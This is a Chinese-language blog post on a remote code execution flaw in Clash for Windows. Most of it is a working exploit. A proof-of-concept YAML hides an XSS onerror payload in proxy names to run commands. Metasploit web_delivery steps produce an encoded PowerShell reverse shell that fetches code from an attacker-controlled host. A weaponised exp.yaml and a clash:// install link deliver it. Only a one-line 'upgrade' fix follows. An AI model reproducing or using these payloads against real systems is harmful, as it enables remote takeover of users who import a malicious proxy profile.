专业编程基础技术教程

网站首页 > 基础教程 正文

Clash远程代码执行漏洞

ccvgpt 2024-11-30 19:15:42 基础教程 1 ℃

0x01 漏洞描述

clash for windows是一个使用 Go 语言编写,基于规则的跨平台代理软件核心程序。 Clash for Windows 是运行在 Windows 上的一图形化 Clash 分支。通过 Clash API 来配置和控制 Clash 核心程序,便于用户可视化操作和使用。

下载链接

Clash远程代码执行漏洞

https://github.com/Fndroid/clash_for_windows_pkg/releases

目前最新版本为V 0.20.12。

Windows 上的 clash_for_windows 在订阅一个恶意链接时存在远程命令执行漏洞。代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令。

0x02 漏洞影响

影响版本版本:< V 0.20.12V

操作系统:Windows x64

系统版本:Windows 11

风险等级:高危

0x03 漏洞复现

本次漏洞复现使用的版本为v 0.18.8 系统为Windows10

新建 poc.yaml 文件,内容如下:

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true

?
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
?

打开clash,进入Profiles,点击 import 导入刚刚新建的 poc.yaml 文件

点击切换到导入的 yaml 文件上

切换节点时,会弹出计算器,说明远程代码执行成功

上线msf

启动msf,搜索 web_delivery 模块

使用 exploit/multi/script/web_delivery 模块

设置 lhost

set lhost 攻击机ip

设置 target

设置 payload

生成反弹shell的payload

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAFQAQgBrAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGMAVABCAGsALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABjAFQAQgBrAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADEAMAA4ADoAOAAwADgAOQAvADAAeQBhAEUASwBpAE0ANgBkAHYALwBYAHkARAB3AEwATQBtAHoAbgB4ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AOAAxAC4AMQAwADgAOgA4ADAAOAA5AC8AMAB5AGEARQBLAGkATQA2AGQAdgAnACkAKQA7AA==

制作exp

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
?
?
proxy-groups:
-
name: <img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
type: select
proxies:
- a<img/src="1"/onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWUgV3dCT0FHVUFkQUF1QUZNQVpRQnlBSFlBYVFCakFHVUFVQUJ2QUdrQWJnQjBBRTBBWVFCdUFHRUFad0JsQUhJQVhRQTZBRG9BVXdCbEFHTUFkUUJ5QUdrQWRBQjVBRkFBY2dCdkFIUUFid0JqQUc4QWJBQTlBRnNBVGdCbEFIUUFMZ0JUQUdVQVl3QjFBSElBYVFCMEFIa0FVQUJ5QUc4QWRBQnZBR01BYndCc0FGUUFlUUJ3QUdVQVhRQTZBRG9BVkFCc0FITUFNUUF5QURzQUpBQmpBRlFBUWdCckFEMEFiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBT3dCcEFHWUFLQUJiQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCUUFISUFid0I0QUhrQVhRQTZBRG9BUndCbEFIUUFSQUJsQUdZQVlRQjFBR3dBZEFCUUFISUFid0I0QUhrQUtBQXBBQzRBWVFCa0FHUUFjZ0JsQUhNQWN3QWdBQzBBYmdCbEFDQUFKQUJ1QUhVQWJBQnNBQ2tBZXdBa0FHTUFWQUJDQUdzQUxnQndBSElBYndCNEFIa0FQUUJiQUU0QVpRQjBBQzRBVndCbEFHSUFVZ0JsQUhFQWRRQmxBSE1BZEFCZEFEb0FPZ0JIQUdVQWRBQlRBSGtBY3dCMEFHVUFiUUJYQUdVQVlnQlFBSElBYndCNEFIa0FLQUFwQURzQUpBQmpBRlFBUWdCckFDNEFVQUJ5QUc4QWVBQjVBQzRBUXdCeUFHVUFaQUJsQUc0QWRBQnBBR0VBYkFCekFEMEFXd0JPQUdVQWRBQXVBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBUXdCaEFHTUFhQUJsQUYwQU9nQTZBRVFBWlFCbUFHRUFkUUJzQUhRQVF3QnlBR1VBWkFCbEFHNEFkQUJwQUdFQWJBQnpBRHNBZlFBN0FFa0FSUUJZQUNBQUtBQW9BRzRBWlFCM0FDMEFid0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFNUUE1QURJQUxnQXhBRFlBT0FBdUFEZ0FNUUF1QURFQU1BQTRBRG9BT0FBd0FEZ0FPUUF2QURBQWVRQmhBRVVBU3dCcEFFMEFOZ0JrQUhZQUx3QllBSGtBUkFCM0FFd0FUUUJ0QUhvQWJnQjRBQ2NBS1FBcEFEc0FTUUJGQUZnQUlBQW9BQ2dBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FFNEFaUUIwQUM0QVZ3QmxBR0lBUXdCc0FHa0FaUUJ1QUhRQUtRQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQlRBSFFBY2dCcEFHNEFad0FvQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0F4QURrQU1nQXVBREVBTmdBNEFDNEFPQUF4QUM0QU1RQXdBRGdBT2dBNEFEQUFPQUE1QUM4QU1BQjVBR0VBUlFCTEFHa0FUUUEyQUdRQWRnQW5BQ2tBS1FBN0FBPT0nKTs=`,`base64`).toString())'>
?

将exp放到攻击机(kali)的根目录下

在clash中导入

点击切换到导入的 yaml 文件上

切换节点时,就能上线msf

0x04 漏洞分析

crash_for_windows由 Electron 提供支持,该产品在代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。

"proxies"中的"name"字段嵌入html标签,"onerror"时触发语句执行。

- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

此外也可以使用本地导入的方式,将yaml的配置文件导入。

另一种方式使用浏览器弹窗进行操作。

clash://install-config?url=http://ip:port/eval.txt&name=RCE

0x05 修复建议

升级到最新版本

0x06 参考链接

https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

https://blog.csdn.net/WEARE001/article/details/123146639

https://mp.weixin.qq.com/s/-jmAXSWOpncnLCWFEAiVgQ

最近发表
标签列表